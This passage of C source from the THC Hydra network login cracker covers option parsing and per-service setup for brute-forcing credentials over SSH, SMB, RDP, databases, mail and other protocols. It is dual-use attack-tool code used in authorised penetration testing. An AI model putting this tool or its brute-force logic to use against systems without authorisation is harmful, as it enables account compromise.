by %s & %s - Please do not use in military or secret \"\n \"service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\\n\\n\",\n PROGRAM, VERSION, AUTHOR, AUTHOR2);\n#ifndef LIBAFP\n SERVICES = hydra_string_replace(SERVICES, \"afp \", \"\");\n strcat(unsupported, \"afp \");\n#endif\n#ifndef LIBFIREBIRD\n SERVICES = hydra_string_replace(SERVICES, \"firebird \", \"\");\n strcat(unsupported, \"firebird \");\n#endif\n#ifndef LIBMCACHED\n SERVICES = hydra_string_replace(SERVICES, \"memcached \", \"\");\n strcat(unsupported, \"memcached \");\n#endif\n#if !defined(LIBMONGODB2) && !defined(LIBMONGODB)\n SERVICES = hydra_string_replace(SERVICES, \"mongodb \", \"\");\n strcat(unsupported, \"mongodb \");\n#endif\n#ifndef LIBMYSQLCLIENT\n SERVICES = hydra_string_replace(SERVICES, \"mysql \", \"mysql(v4) \");\n strcat(unsupported, \"mysql5 \");\n#endif\n#ifndef LIBNCP\n SERVICES = hydra_string_replace(SERVICES, \"ncp \", \"\");\n strcat(unsupported, \"ncp \");\n#endif\n#ifndef LIBORACLE\n SERVICES = hydra_string_replace(SERVICES, \"oracle \", \"\");\n strcat(unsupported, \"oracle \");\n#endif\n#ifndef LIBPOSTGRES\n SERVICES = hydra_string_replace(SERVICES, \"postgres \", \"\");\n strcat(unsupported, \"postgres \");\n#endif\n#ifndef HAVE_GCRYPT\n SERVICES = hydra_string_replace(SERVICES, \"radmin2 \", \"\");\n strcat(unsupported, \"radmin2 \");\n#endif\n#ifndef LIBFREERDP\n SERVICES = hydra_string_replace(SERVICES, \"rdp \", \"\");\n strcat(unsupported, \"rdp \");\n#endif\n#ifndef LIBSAPR3\n SERVICES = hydra_string_replace(SERVICES, \"sapr3 \", \"\");\n strcat(unsupported, \"sapr3 \");\n#endif\n#ifndef LIBSSH\n SERVICES = hydra_string_replace(SERVICES, \"ssh \", \"\");\n strcat(unsupported, \"ssh \");\n SERVICES = hydra_string_replace(SERVICES, \"sshkey \", \"\");\n strcat(unsupported, \"sshkey \");\n#endif\n#ifndef LIBSVN\n SERVICES = hydra_string_replace(SERVICES, \"svn \", \"\");\n strcat(unsupported, \"svn \");\n#endif\n#if !defined(LIBSMBCLIENT)\n SERVICES = hydra_string_replace(SERVICES, \"smb2 \", \"\");\n strcat(unsupported, \"smb2 \");\n#endif\n\n#ifndef LIBOPENSSL\n // for ftps\n SERVICES = hydra_string_replace(SERVICES, \"ftp[s]\", \"ftp\");\n // for pop3\n SERVICES = hydra_string_replace(SERVICES, \"pop3[s]\", \"pop3\");\n // for imap\n SERVICES = hydra_string_replace(SERVICES, \"imap[s]\", \"imap\");\n // for smtp\n SERVICES = hydra_string_replace(SERVICES, \"smtp[s]\", \"smtp\");\n // for telnet\n SERVICES = hydra_string_replace(SERVICES, \"telnet[s]\", \"telnet\");\n // for http[s]-{head|get}\n SERVICES = hydra_string_replace(SERVICES, \"http[s]\", \"http\");\n // for http[s]-{get|post}-form\n SERVICES = hydra_string_replace(SERVICES, \"http[s]\", \"http\");\n // for ldap3\n SERVICES = hydra_string_replace(SERVICES, \"[-{cram|digest}md5]\", \"\");\n // for sip\n SERVICES = hydra_string_replace(SERVICES, \" sip\", \"\");\n // for oracle-listener\n SERVICES = hydra_string_replace(SERVICES, \" oracle-listener\", \"\");\n // general\n SERVICES = hydra_string_replace(SERVICES, \"[s]\", \"\");\n // for oracle-sid\n SERVICES = hydra_string_replace(SERVICES, \" oracle-sid\", \"\");\n strcat(unsupported, \"SSL-services (ftps, sip, rdp, oracle-services, ...) \");\n#endif\n\n#ifndef HAVE_MATH_H\n if (strlen(unsupported) > 0)\n strcat(unsupported, \"and \");\n strcat(unsupported, \"password bruteforce generation \");\n#endif\n#ifndef HAVE_PCRE\n if (strlen(unsupported) > 0)\n strcat(unsupported, \"and \");\n strcat(unsupported, \"regex support \");\n#endif\n\n (void)setvbuf(stdout, NULL, _IONBF, 0);\n (void)setvbuf(stderr, NULL, _IONBF, 0);\n // set defaults\n memset(&hydra_options, 0, sizeof(hydra_options));\n memset(&hydra_brains, 0, sizeof(hydra_brains));\n prg = argv[0];\n hydra_options.debug = debug = 0;\n hydra_options.verbose = verbose = 0;\n found = 0;\n use_proxy = 0;\n proxy_count = 0;\n selected_proxy = -1;\n proxy_string_ip[0][0] = 0;\n proxy_string_port[0] = 0;\n strcpy(proxy_string_type[0], \"connect\");\n proxy_authentication[0] = cmdlinetarget = NULL;\n hydra_options.login = NULL;\n hydra_options.loginfile = NULL;\n hydra_options.pass = NULL;\n hydra_options.passfile = NULL;\n hydra_options.distributed = NULL;\n hydra_options.tasks = TASKS;\n hydra_options.max_use = MAXTASKS;\n hydra_options.outfile_format = FORMAT_PLAIN_TEXT;\n hydra_brains.ofp = stdout;\n hydra_brains.targets = 1;\n hydra_options.waittime = waittime = WAITTIME;\n bf_options.disable_symbols = 0;\n\n // command line processing\n if (argc > 1 && strncmp(argv[1], \"-h\", 2) == 0)\n help(1);\n if (argc < 2)\n help(0);\n while ((i = getopt(argc, argv, \"hIq64Rrde:vVl:fFg:D:L:p:OP:o:b:M:C:t:T:m:w:W:s:SUux:yc:K\")) >= 0) {\n switch (i) {\n case 'D':\n hydra_options.distributed = optarg;\n if (sscanf(hydra_options.distributed, \"%dof%d\", &my_segment, &num_segments) != 2) {\n fprintf(stderr, \"Invalid format. Expected format -D XofY where X and Y are integers.\\n\");\n exit(EXIT_FAILURE);\n } else {\n fprintf(stdout, \"Option \\'D\\': successfully set X to %d and Y to %d\\n\", my_segment, num_segments);\n }\n break;\n case 'h':\n help(1);\n break;\n case 'q':\n quiet = 1;\n break;\n case 'K':\n hydra_options.skip_redo = 1;\n break;\n case 'O':\n old_ssl = 1;\n break;\n case 'u':\n hydra_options.loop_mode = 1;\n break;\n case '6':\n prefer_ipv6 = 1;\n break;\n case '4':\n prefer_ipv6 = 0;\n break;\n case 'R':\n hydra_options.restore = 1;\n hydra_restore_read();\n break;\n case 'r':\n fprintf(stderr, \"Warning: the option -r has been removed.\\n\");\n break;\n case 'I':\n ignore_restore = 1; // this is not to be saved in hydra_options!\n break;\n case 'd':\n hydra_options.debug = ++debug;\n ++verbose;\n break;\n case 'e':\n i = 0;\n while (i < strlen(optarg)) {\n switch (optarg[i]) {\n case 'r':\n hydra_options.try_password_reverse_login = 1;\n hydra_options.mode = hydra_options.mode | MODE_PASSWORD_REVERSE;\n break;\n case 'n':\n hydra_options.try_null_password = 1;\n hydra_options.mode = hydra_options.mode | MODE_PASSWORD_NULL;\n break;\n case 's':\n hydra_options.try_password_same_as_login = 1;\n hydra_options.mode = hydra_options.mode | MODE_PASSWORD_SAME;\n break;\n default:\n fprintf(stderr,\n \"[ERROR] unknown mode %c for option -e, only supporting \"\n \"\\\"n\\\", \\\"s\\\" and \\\"r\\\"\\n\",\n optarg[i]);\n exit(-1);\n }\n i++;\n }\n break;\n case 'v':\n hydra_options.verbose = verbose = 1;\n break;\n case 'V':\n hydra_options.showAttempt = 1;\n break;\n case 'l':\n hydra_options.login = optarg;\n break;\n case 'L':\n hydra_options.loginfile = optarg;\n hydra_options.mode = hydra_options.mode | MODE_LOGIN_LIST;\n break;\n case 'p':\n hydra_options.pass = optarg;\n break;\n case 'P':\n hydra_options.passfile = optarg;\n hydra_options.mode = hydra_options.mode | MODE_PASSWORD_LIST;\n break;\n case 'f':\n hydra_options.exit_found = 1;\n break;\n case 'F':\n hydra_options.exit_found = 2;\n break;\n case 'o':\n hydra_options.outfile_ptr = optarg;\n // colored_output = 0;\n break;\n case 'b':\n outfile_format_tmp = optarg;\n if (strcasecmp(outfile_format_tmp, \"text\") == 0)\n hydra_options.outfile_format = FORMAT_PLAIN_TEXT;\n else if (strcasecmp(outfile_format_tmp, \"json\") == 0) // latest json formatting.\n hydra_options.outfile_format = FORMAT_JSONV1;\n else if (strcasecmp(outfile_format_tmp, \"jsonv1\") == 0)\n hydra_options.outfile_format = FORMAT_JSONV1;\n else {\n fprintf(stderr, \"[ERROR] Output file format must be (text, json, jsonv1)\\n\");\n exit(-1);\n }\n // colored_output = 0;\n break;\n case 'M':\n hydra_options.infile_ptr = optarg;\n break;\n case 'C':\n hydra_options.colonfile = optarg;\n hydra_options.mode = MODE_COLON_FILE;\n break;\n case 'm':\n hydra_options.miscptr = optarg;\n break;\n case 'w':\n hydra_options.waittime = waittime = atoi(optarg);\n if (waittime < 1) {\n fprintf(stderr, \"[ERROR] waittime must be larger than 0\\n\");\n exit(-1);\n } else if (waittime < 5)\n fprintf(stderr, \"[WARNING] the waittime you set is low, this can \"\n \"result in errornous results\\n\");\n break;\n case 'W':\n hydra_options.conwait = conwait = atoi(optarg);\n break;\n case 's':\n hydra_options.port = port = atoi(optarg);\n break;\n case 'c':\n#ifdef MSG_PEEK\n hydra_options.time_next_attempt = atoi(optarg);\n if (hydra_options.time_next_attempt < 0) {\n fprintf(stderr, \"[ERROR] -c option value can not be negative\\n\");\n exit(-1);\n }\n#else\n fprintf(stderr, \"[WARNING] -c option can not be used as your operating \"\n \"system is missing the MSG_PEEK feature\\n\");\n#endif\n break;\n case 'S':\n#ifndef LIBOPENSSL\n fprintf(stderr, \"[WARNING] hydra was compiled without SSL support. \"\n \"Install openssl and recompile! Option ignored...\\n\");\n hydra_options.ssl = 0;\n break;\n#else\n hydra_options.ssl = 1;\n break;\n#endif\n case 't':\n hydra_options.tasks = atoi(optarg);\n break;\n case 'T':\n hydra_options.max_use = atoi(optarg);\n break;\n case 'U':\n modusage = 1;\n break;\n case 'x':\n#ifndef HAVE_MATH_H\n fprintf(stderr, \"[ERROR] -x option is not available as math.h was not \"\n \"found at compile time\\n\");\n exit(-1);\n#else\n if (strcmp(optarg, \"-h\") == 0)\n help_bfg();\n bf_options.arg = optarg;\n hydra_options.bfg = 1;\n hydra_options.mode = hydra_options.mode | MODE_PASSWORD_BRUTE;\n hydra_options.loop_mode = 1;\n break;\n#endif\n case 'y':\n bf_options.disable_symbols = 1;\n break;\n default:\n exit(-1);\n }\n }\n\n if (hydra_options.time_next_attempt > 0 && hydra_options.tasks != 1) {\n printf(\"[INFO] setting max tasks per host to 1 due to -c option usage\\n\");\n hydra_options.tasks = 1;\n }\n\n // check if output is redirected from the shell or in a file\n if (colored_output && !isatty(fileno(stdout)))\n colored_output = 0;\n\n#ifdef LIBNCURSES\n // then check if the term is color enabled using ncurses lib\n if (colored_output) {\n if (!setupterm(NULL, 1, NULL) && (tigetnum(\"colors\") <= 0)) {\n colored_output = 0;\n }\n if (cur_term) {\n del_curterm(cur_term);\n }\n }\n#else\n // don't want border line effect so disabling color output\n // if we are not sure about the term\n colored_output = 0;\n#endif\n\n if (debug)\n printf(\"[DEBUG] Output color flag is %d\\n\", colored_output);\n\n if (hydra_options.restore && argc > 2 + debug + verbose)\n fprintf(stderr, \"[WARNING] options after -R are now honored (since v8.6)\\n\");\n // bail(\"no option may be supplied together with -R\");\n\n printf(\"%s (%s) starting at %s\\n\", PROGRAM, RESOURCE, hydra_build_time());\n if (debug) {\n printf(\"[DEBUG] cmdline: \");\n for (i = 0; i < argc; i++)\n printf(\"%s \", argv[i]);\n printf(\"\\n\");\n }\n if (hydra_options.tasks > 1 && hydra_options.time_next_attempt)\n fprintf(stderr, \"[WARNING] when using the -c option, you should also set \"\n \"the task per target to one (-t 1)\\n\");\n if (hydra_options.login != NULL && hydra_options.loginfile != NULL)\n bail(\"You can only use -L OR -l, not both\\n\");\n if (hydra_options.pass != NULL && hydra_options.passfile != NULL)\n bail(\"You can only use -P OR -p, not both\\n\");\n if (hydra_options.outfile_format != FORMAT_PLAIN_TEXT && hydra_options.outfile_ptr == NULL)\n fprintf(stderr, \"[WARNING] output file format specified (-b) - but no \"\n \"output file (-o)\\n\");\n\n if (hydra_options.restore) {\n // hydra_restore_read();\n // stuff we have to copy from the non-restore part\n if (strncmp(hydra_options.service, \"http-\", 5) == 0) {\n if (getenv(\"HYDRA_PROXY_HTTP\") && getenv(\"HYDRA_PROXY\"))\n bail(\"Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - \"\n \"you can use only ONE for the service \"\n \"http-head/http-get/http-post!\");\n if (getenv(\"HYDRA_PROXY_HTTP\")) {\n printf(\"[INFO] Using HTTP Proxy: %s\\n\", getenv(\"HYDRA_PROXY_HTTP\"));\n use_proxy = 1;\n }\n }\n } else { // normal mode, aka non-restore mode\n if (hydra_options.colonfile)\n hydra_options.loop_mode = 0; // just to be sure\n if (hydra_options.infile_ptr != NULL) {\n if (optind + 2 < argc)\n bail(\"The -M FILE option can not be used together with a host on the \"\n \"commandline\");\n if (optind + 1 > argc)\n bail(\"You need to define a service to attack\");\n if (optind + 2 == argc)\n fprintf(stderr, \"[WARNING] With the -M FILE option you can not specify a server on \"\n \"the commandline. Lets hope you did everything right!\\n\");\n hydra_options.server = NULL;\n hydra_options.service = argv[optind];\n if (optind + 2 == argc)\n hydra_options.miscptr = argv[optind + 1];\n } else if (optind + 2 != argc && optind + 3 != argc && optind < argc) {\n // check if targetdef follow syntax\n // ://[:][/] or it's a\n // syntax error\n char *targetdef = strdup(argv[optind]);\n char *service_pos, *target_pos, *port_pos = NULL, *param_pos = NULL;\n cmdlinetarget = argv[optind];\n\n if ((targetdef != NULL) && (strstr(targetdef, \"://\") != NULL)) {\n service_pos = strstr(targetdef, \"://\");\n if ((service_pos - targetdef) == 0)\n bail(\"could not identify service\");\n if ((hydra_options.service = malloc(1 + service_pos - targetdef)) == NULL)\n bail(\"could not alloc memory\");\n strncpy(hydra_options.service, targetdef, service_pos - targetdef);\n hydra_options.service[service_pos - targetdef] = 0;\n target_pos = targetdef + (service_pos - targetdef + 3);\n\n if (*target_pos == '[') {\n target_pos++;\n if ((param_pos = strchr(target_pos, ']')) == NULL)\n bail(\"no closing ']' found in target definition\");\n *param_pos++ = 0;\n if (*param_pos == ':')\n port_pos = ++param_pos;\n if ((param_pos = strchr(param_pos, '/')) != NULL)\n *param_pos++ = 0;\n } else {\n port_pos = strchr(target_pos, ':');\n param_pos = strchr(target_pos, '/');\n if (port_pos != NULL && param_pos != NULL && port_pos > param_pos)\n port_pos = NULL;\n if (port_pos != NULL)\n *port_pos++ = 0;\n if (param_pos != NULL)\n *param_pos++ = 0;\n if (port_pos != NULL && strchr(port_pos, ':') != NULL) {\n if (prefer_ipv6)\n bail(\"Illegal IPv6 target definition must be written within '[' \"\n \"']'\");\n else\n bail(\"Illegal port definition\");\n }\n }\n if (*target_pos == 0)\n hydra_options.server = NULL;\n else\n hydra_options.server = target_pos;\n if (port_pos != NULL)\n hydra_options.port = port = atoi(port_pos);\n if (param_pos != NULL) {\n if (strstr(hydra_options.service, \"http\") != NULL && strstr(hydra_options.service, \"http-proxy\") == NULL && param_pos[1] != '/')\n *--param_pos = '/';\n hydra_options.miscptr = strdup(param_pos);\n }\n // printf(\"target: %s service: %s port: %s opt: %s\\n\", target_pos,\n // hydra_options.service, port_pos, param_pos);\n if (debug)\n printf(\"[DEBUG] opt:%d argc:%d mod:%s tgt:%s port:%u misc:%s\\n\", optind, argc, hydra_options.service, hydra_options.server, hydra_options.port, hydra_options.miscptr);\n } else {\n hydra_options.server = NULL;\n hydra_options.service = NULL;\n\n if (modusage) {\n hydra_options.service = targetdef;\n } else\n help(0);\n }\n } else {\n if (modusage && argv[optind] == NULL) {\n printf(\"[ERROR] you must supply a service name after the -U help \"\n \"switch\\n\");\n exit(-1);\n }\n if (argv[optind] == NULL || strstr(argv[optind], \"://\") != NULL) {\n printf(\"[ERROR] Invalid target definition!\\n\");\n printf(\"[ERROR] Either you use \\\"www.example.com module \"\n \"[optional-module-parameters]\\\" *or* you use the \"\n \"\\\"module://www.example.com/optional-module-parameters\\\" \"\n \"syntax!\\n\");\n exit(-1);\n }\n hydra_options.server = argv[optind];\n cmdlinetarget = argv[optind];\n hydra_options.service = argv[optind + 1];\n if (optind + 3 == argc)\n hydra_options.miscptr = argv[optind + 2];\n }\n\n if (getenv(\"HYDRA_PROXY_CONNECT\"))\n fprintf(stderr, \"[WARNING] The environment variable HYDRA_PROXY_CONNECT \"\n \"is not used! Use HYDRA_PROXY instead!\\n\");\n\n // wrong option use patch\n if (hydra_options.ssl && (((strcmp(hydra_options.service, \"smtp\") == 0 || strcmp(hydra_options.service, \"smtp-enum\") == 0) && hydra_options.port != 465) || (strcmp(hydra_options.service, \"pop3\") == 0 && hydra_options.port != 995) || (strcmp(hydra_options.service, \"imap\") == 0 && hydra_options.port != 993)))\n fprintf(stderr, \"[WARNING] you want to access SMTP/POP3/IMAP with SSL. Are you sure \"\n \"you want to use direct SSL (-S) instead of STARTTLS (-m TLS)?\\n\");\n\n if (strcmp(hydra_options.service, \"http\") == 0 || strcmp(hydra_options.service, \"https\") == 0) {\n fprintf(stderr,\n \"[ERROR] There is no service \\\"%s\\\", most likely you mean one of the \"\n \"many web modules, e.g. http-get or http-form-post. Read it up!\\n\",\n hydra_options.service);\n exit(-1);\n }\n\n if (strcmp(hydra_options.service, \"pop3s\") == 0 || strcmp(hydra_options.service, \"smtps\") == 0 || strcmp(hydra_options.service, \"imaps\") == 0 || strcmp(hydra_options.service, \"telnets\") == 0 || (strncmp(hydra_options.service, \"ldap\", 4) == 0 && hydra_options.service[strlen(hydra_options.service) - 1] == 's')) {\n hydra_options.ssl = 1;\n hydra_options.service[strlen(hydra_options.service) - 1] = 0;\n }\n\n if (getenv(\"HYDRA_PROXY_HTTP\") || getenv(\"HYDRA_PROXY\")) {\n if (strcmp(hydra_options.service, \"afp\") == 0 || strcmp(hydra_options.service, \"firebird\") == 0 || strncmp(hydra_options.service, \"mysql\", 5) == 0 || strcmp(hydra_options.service, \"ncp\") == 0 || strcmp(hydra_options.service, \"oracle\") == 0 || strcmp(hydra_options.service, \"postgres\") == 0 || strncmp(hydra_options.service, \"ssh\", 3) == 0 || strcmp(hydra_options.service, \"sshkey\") == 0 || strcmp(hydra_options.service, \"svn\") == 0 || strcmp(hydra_options.service, \"sapr3\") == 0 ||\n strcmp(hydra_options.service, \"memcached\") == 0 || strcmp(hydra_options.service, \"mongodb\") == 0) {\n fprintf(stderr, \"[WARNING] module %s does not support HYDRA_PROXY* !\\n\", hydra_options.service);\n proxy_string = NULL;\n }\n }\n\n /* here start the services */\n\n if (strcmp(hydra_options.service, \"ssl\") == 0 || strcmp(hydra_options.service, \"www\") == 0 || strcmp(hydra_options.service, \"http\") == 0 || strcmp(hydra_options.service, \"https\") == 0) {\n fprintf(stderr, \"[WARNING] The service http has been replaced with http-head and \"\n \"http-get, using by default GET method. Same for https.\\n\");\n if (strcmp(hydra_options.service, \"http\") == 0) {\n hydra_options.service = malloc(strlen(\"http-get\") + 1);\n strcpy(hydra_options.service, \"http-get\");\n }\n if (strcmp(hydra_options.service, \"https\") == 0) {\n hydra_options.service = malloc(strlen(\"https-get\") + 1);\n strcpy(hydra_options.service, \"https-get\");\n }\n }\n\n if (strcmp(hydra_options.service, \"http-form-get\") == 0)\n strcpy(hydra_options.service, \"http-get-form\");\n if (strcmp(hydra_options.service, \"https-form-get\") == 0)\n strcpy(hydra_options.service, \"https-get-form\");\n if (strcmp(hydra_options.service, \"http-form-post\") == 0)\n strcpy(hydra_options.service, \"http-post-form\");\n if (strcmp(hydra_options.service, \"https-form-post\") == 0)\n strcpy(hydra_options.service, \"https-post-form\");\n\n if (modusage == 1) {\n if (hydra_options.service == NULL) {\n printf(\"[ERROR] you must supply a service name after the -U help \"\n \"switch\\n\");\n exit(-1);\n }\n module_usage();\n }\n\n i = 0;\n if (strcmp(hydra_options.service, \"telnet\") == 0) {\n fprintf(stderr, \"[WARNING] telnet is by its nature unreliable to analyze, if \"\n \"possible better choose FTP, SSH, etc. if available\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"ftp\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"ftps\") == 0) {\n fprintf(stderr, \"[WARNING] you enabled ftp-SSL (auth tls) mode. If you want to \"\n \"use direct SSL ftp, use -S and the ftp module instead.\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"pop3\") == 0) {\n fprintf(stderr, \"[INFO] several providers have implemented cracking protection, \"\n \"check with a small wordlist first - and stay legal!\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"imap\") == 0) {\n fprintf(stderr, \"[INFO] several providers have implemented cracking protection, \"\n \"check with a small wordlist first - and stay legal!\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"redis\") == 0)\n i = 2;\n if (strcmp(hydra_options.service, \"asterisk\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"vmauthd\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"rexec\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"rlogin\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"rsh\") == 0)\n i = 3;\n if (strcmp(hydra_options.service, \"nntp\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"socks5\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"icq\") == 0) {\n fprintf(stderr, \"[WARNING] The icq module is not working with the modern \"\n \"protocol version! (somebody else will need to fix this \"\n \"as I don't care for icq)\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"memcached\") == 0)\n#ifdef LIBMCACHED\n i = 1;\n#else\n bail(\"Compiled without LIBMCACHED support, module not available!\");\n#endif\n\n if (strcmp(hydra_options.service, \"mongodb\") == 0)\n#if defined(LIBMONGODB2) || defined(LIBMONGODB)\n {\n i = 1;\n if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0))\n fprintf(stderr, \"[INFO] The mongodb db wasn't passed so using admin by default\\n\");\n }\n#else\n bail(\"Compiled without LIBMONGODB support, module not available!\");\n#endif\n\n if (strcmp(hydra_options.service, \"mysql\") == 0) {\n i = 1;\n if (hydra_options.tasks > 4) {\n fprintf(stderr, \"[INFO] Reduced number of tasks to 4 (mysql does not \"\n \"like many parallel connections)\\n\");\n hydra_options.tasks = 4;\n }\n }\n if (strcmp(hydra_options.service, \"mssql\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"cobaltstrike\") == 0)\n i = 2;\n if ((strcmp(hydra_options.service, \"oracle-listener\") == 0) || (strcmp(hydra_options.service, \"tns\") == 0)) {\n i = 2;\n hydra_options.service = malloc(strlen(\"oracle-listener\") + 1);\n strcpy(hydra_options.service, \"oracle-listener\");\n }\n if ((strcmp(hydra_options.service, \"oracle-sid\") == 0) || (strcmp(hydra_options.service, \"sid\") == 0)) {\n i = 3;\n hydra_options.service = malloc(strlen(\"oracle-sid\") + 1);\n strcpy(hydra_options.service, \"oracle-sid\");\n }\n#ifdef LIBORACLE\n if ((strcmp(hydra_options.service, \"oracle\") == 0) || (strcmp(hydra_options.service, \"ora\") == 0)) {\n i = 1;\n hydra_options.service = malloc(strlen(\"oracle\") + 1);\n strcpy(hydra_options.service, \"oracle\");\n }\n#endif\n if (strcmp(hydra_options.service, \"postgres\") == 0)\n#ifdef LIBPOSTGRES\n i = 1;\n#else\n bail(\"Compiled without LIBPOSTGRES support, module not available!\");\n#endif\n if (strcmp(hydra_options.service, \"firebird\") == 0)\n#ifdef LIBFIREBIRD\n i = 1;\n#else\n bail(\"Compiled without LIBFIREBIRD support, module not available!\");\n#endif\n if (strcmp(hydra_options.service, \"afp\") == 0)\n#ifdef LIBAFP\n i = 1;\n#else\n bail(\"Compiled without LIBAFP support, module not available!\");\n#endif\n if (strcmp(hydra_options.service, \"svn\") == 0)\n#ifdef LIBSVN\n i = 1;\n#else\n bail(\"Compiled without LIBSVN support, module not available!\");\n#endif\n if (strcmp(hydra_options.service, \"ncp\") == 0)\n#ifdef LIBNCP\n i = 1;\n#else\n bail(\"Compiled without LIBNCP support, module not available!\");\n#endif\n\n if (strcmp(hydra_options.service, \"pcanywhere\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"http-proxy\") == 0) {\n i = 1;\n if (hydra_options.miscptr != NULL && strncmp(hydra_options.miscptr, \"http://\", 7) != 0)\n bail(\"module option must start with http://\");\n }\n if (strcmp(hydra_options.service, \"cvs\") == 0) {\n i = 1;\n if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0)) {\n fprintf(stderr, \"[INFO] The CVS repository path wasn't passed so using \"\n \"/root by default\\n\");\n }\n }\n if (strcmp(hydra_options.service, \"svn\") == 0) {\n i = 1;\n if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0)) {\n fprintf(stderr, \"[INFO] The SVN repository path wasn't passed so using \"\n \"/trunk by default\\n\");\n }\n }\n if (strcmp(hydra_options.service, \"ssh\") == 0 || strcmp(hydra_options.service, \"sshkey\") == 0) {\n if (hydra_options.tasks > 8)\n fprintf(stderr, \"[WARNING] Many SSH configurations limit the number of parallel \"\n \"tasks, it is recommended to reduce the tasks: use -t 4\\n\");\n#ifdef LIBSSH\n i = 1;\n#else\n bail(\"Compiled without LIBSSH v0.4.x support, module is not available!\");\n#endif\n }\n if (strcmp(hydra_options.service, \"smtp\") == 0) {\n fprintf(stderr, \"[INFO] several providers have implemented cracking protection, \"\n \"check with a small wordlist first - and stay legal!\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"smtp-enum\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"teamspeak\") == 0)\n i = 1;\n if ((strcmp(hydra_options.service, \"smb\") == 0) || (strcmp(hydra_options.service, \"smbnt\") == 0)) {\n if (hydra_options.tasks > 1) {\n fprintf(stderr, \"[INFO] Reduced number of tasks to 1 (smb does not \"\n \"like parallel connections)\\n\");\n hydra_options.tasks = 1;\n }\n if (hydra_options.login != NULL && (strchr(hydra_options.login, '\\\\') != NULL || strchr(hydra_options.login, '/') != NULL))\n fprintf(stderr, \"[WARNING] potential windows domain specification found in \"\n \"login. You must use the -m option to pass a domain.\\n\");\n i = 1;\n }\n if ((strcmp(hydra_options.service, \"smb\") == 0) || (strcmp(hydra_options.service, \"smbnt\") == 0)) {\n#ifdef LIBOPENSSL\n if (hydra_options.tasks > 1) {\n fprintf(stderr, \"[INFO] Reduced number of tasks to 1 (smb does not \"\n \"like parallel connections)\\n\");\n hydra_options.tasks = 1;\n }\n i = 1;\n#endif\n }\n if ((strcmp(hydra_options.service, \"smb\") == 0) || (strcmp(hydra_options.service, \"smbnt\") == 0) || (strcmp(hydra_options.service, \"sip\") == 0) || (strcmp(hydra_options.service, \"oracle-listener\") == 0) || (strcmp(hydra_options.service, \"oracle-sid\") == 0)) {\n#ifndef LIBOPENSSL\n bail(\"Compiled without OPENSSL support, module not available!\");\n#endif\n }\n if (strcmp(hydra_options.service, \"smb2\") == 0) {\n#if !defined(LIBSMBCLIENT)\n bail(\"Compiled without LIBSMBCLIENT support, module not available!\");\n#else\n if (hydra_options.login != NULL && (strchr(hydra_options.login, '\\\\') != NULL || strchr(hydra_options.login, '/') != NULL))\n fprintf(stderr, \"[WARNING] potential windows domain specification found in \"\n \"login. You must use the -m option to pass a domain.\\n\");\n if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0)) {\n fprintf(stderr, \"[WARNING] Workgroup was not specified, using \\\"WORKGROUP\\\"\\n\");\n }\n i = 1;\n#endif\n }\n\n if (strcmp(hydra_options.service, \"rdp\") == 0) {\n#ifndef LIBFREERDP\n bail(\"Compiled without FREERDP support, modules not available!\");\n#endif\n }\n if (strcmp(hydra_options.service, \"pcnfs\") == 0) {\n i = 1;\n if (port == 0)\n bail(\"You must set the port for pcnfs with -s (run \\\"rpcinfo -p %s\\\" \"\n \"and look for the pcnfs v2 UDP port)\");\n }\n if (strcmp(hydra_options.service, \"sapr3\") == 0) {\n#ifdef LIBSAPR3\n i = 1;\n if (port == PORT_SAPR3)\n bail(\"You must set the port for sapr3 with -s , it should lie \"\n \"between 3200 and 3699.\");\n if (port < 3200 || port > 3699)\n fprintf(stderr, \"[WARNING] The port is not in the range 3200 to 3399 - \"\n \"please ensure it is ok!\\n\");\n if (hydra_options.miscptr == NULL || atoi(hydra_options.miscptr) < 0 || atoi(hydra_options.miscptr) > 999 || !isdigit(hydra_options.miscptr[0]))\n bail(\"You must set the client ID (0-999) as an additional option or \"\n \"via -m\");\n#else\n bail(\"Compiled without LIBSAPR3 support, module not available!\");\n#endif\n }\n if (strcmp(hydra_options.service, \"cisco\") == 0) {\n i = 2;\n if (hydra_options.tasks > 4)\n fprintf(stderr, \"[WARNING] you should set the number of parallel task \"\n \"to 4 for cisco services.\\n\");\n }\n if (strcmp(hydra_options.service, \"adam6500\") == 0) {\n i = 2;\n fprintf(stderr, \"[WARNING] the module adam6500 is work in progress! \"\n \"please submit a pcap of a successful login as well as \"\n \"false positives to vh@thc.org\\n\");\n if (hydra_options.tasks > 1)\n fprintf(stderr, \"[WARNING] reset the number of parallel task to 1 for \"\n \"adam6500 modbus authentication\\n\");\n hydra_options.tasks = 1;\n }\n if (strncmp(hydra_options.service, \"snmpv\", 5) == 0) {\n hydra_options.service[4] = hydra_options.service[5];\n hydra_options.service[5] = 0;\n }\n if (strcmp(hydra_options.service, \"snmp\") == 0 || strcmp(hydra_options.service, \"snmp1\") == 0) {\n hydra_options.service[4] = 0;\n i = 2;\n }\n if (strcmp(hydra_options.service, \"snmp2\") == 0 || strcmp(hydra_options.service, \"snmp3\") == 0) {\n if (hydra_options.miscptr == NULL)\n hydra_options.miscptr = strdup(hydra_options.service + 4);\n else {\n tmpptr = malloc(strlen(hydra_options.miscptr) + 4);\n strcpy(tmpptr, hydra_options.miscptr);\n strcat(tmpptr, \":\");\n strcat(tmpptr, hydra_options.service + 4);\n hydra_options.miscptr = tmpptr;\n }\n hydra_options.service[4] = 0;\n i = 2;\n 